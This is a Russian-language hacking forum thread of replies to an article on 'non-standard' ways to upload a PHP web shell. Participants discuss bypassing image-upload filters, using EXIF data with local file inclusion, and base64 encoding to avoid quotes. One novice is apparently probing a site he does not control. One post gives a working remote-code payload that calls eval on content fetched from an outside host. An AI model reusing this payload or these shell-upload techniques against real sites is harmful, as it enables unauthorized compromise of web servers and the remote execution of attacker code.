Авторские статьи Не стандартные способы заливки шелла

Discussion in 'Статьи' started by Osstudio, 11 Dec 2011.

  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Alex2103,
    lol. Как .jpg будет выполнятся как .php, если нет .htaccess-а? Думаю ТС сказал про exif, чтобы помочь при LFI.
     
  2. Alex2103

    Alex2103 New Member

    Joined:
    6 Mar 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    ребят подскажите я обхожу фильтры, у меня картинка закачивается
    всё ок! коменты остаются

    ну как мне понять работает ли эта уязвимость на этом сайте
    вдруг админ заблочил

    то есть, я имею ввиду, и так и сяк пробовал не получается ((
     
    #102 Alex2103, 11 Mar 2012
    Last edited: 11 Mar 2012
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    ок, подправим ;)
     
  4. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    зачем это, если можно тупо ?e=eval(file_get_contents('http://updateyou.ru/1.txt'));
     
  5. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Ну, это почти всегда срабатывает =)
     
  6. sasha.seven

    sasha.seven Banned

    Joined:
    4 Jun 2011
    Messages:
    45
    Likes Received:
    6
    Reputations:
    1
    Полезная инфа благодарю, пару методов уже знал но всё равно добавилось знаний:)
     
  7. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Честно говоря, есть ещё пару методов, но их раскрывать не стоит :)
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Мы сдесь делимся общеми методами, чтоб была пища для мозгов что и как можно сделать и что из этого всего общего приготовить свое уникальное, а не своими уникальнастями)

    P.S: OxoTnik - не выложим ;)
     
    _________________________
    1 person likes this.
  9. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    хватит выпендриваться. у вас просто нету ничего такого.
     
    1 person likes this.
  10. GrandMaster

    GrandMaster Active Member

    Joined:
    16 May 2009
    Messages:
    107
    Likes Received:
    114
    Reputations:
    25
    Охотник такой клоун, ой я не могу

    P.s да покарает меня модер за флуд и оффтоп
     
    3 people like this.
  11. twost

    twost Member

    Joined:
    24 Apr 2010
    Messages:
    4
    Likes Received:
    5
    Reputations:
    5
    Отличная статья! Молодцы ребята.

    У меня вопрос, как у начинающего хакера - а можете выложить теперь стандартные способы заливки шелла? (надеюсь не ошибся в терминологии).

    Заранее спасибо.
     
    2 people like this.
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    TC ошибся. Он случайно "не" в название добавил. Извиняйте!

    P.S. Троллинг не удался у тебя :D
     
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Типо того :D

    Вообще, стандартный метод, это тупо залить PHP, видимо =) А всё остальное - это обходы, т.е не стандартно))
     
    1 person likes this.
  14. GrandMaster

    GrandMaster Active Member

    Joined:
    16 May 2009
    Messages:
    107
    Likes Received:
    114
    Reputations:
    25
    На свой сайт через фтп?
     
  15. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Ты нах*я приват спалил?
    Да вообще-то есть пару методов, которые раскрывать не стоит)
     
    #115 Osstudio, 26 Mar 2012
    Last edited: 27 Mar 2012
  16. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Добавил про то, что если нельзя юзать кавычки, то можно использовать base64, расписал как можно более для новичков.
     
  17. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    multiple facepalm.

    Что это?! Зачем писать в файл дополнительные символы?!
    Мой мозг...
     
  18. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    я :)
    Потому-что без кавычек в переменную нельзя занести спец символы, только если их какой либо глобальной переменной. А зато мы можем зашифровать в base64, но бывает так, что он оканчивается на ==, тогда можно добавить два символа в код, и эти знаки отпадают... т.к там идёт 0 равно, 1 равно, 2 равно, 0 равно... и т.д
     
  19. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Rest in Peace, achat!
     
  20. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    Я думаю осстудио нужно как и суицид назначить модератором какого-нибудь раздела, ну, например, Уязвимости или Безопасность и продвинуть в ЛОА. А я, пожалуй, скоро свалю из этого местечка, что-то надоело мне тут.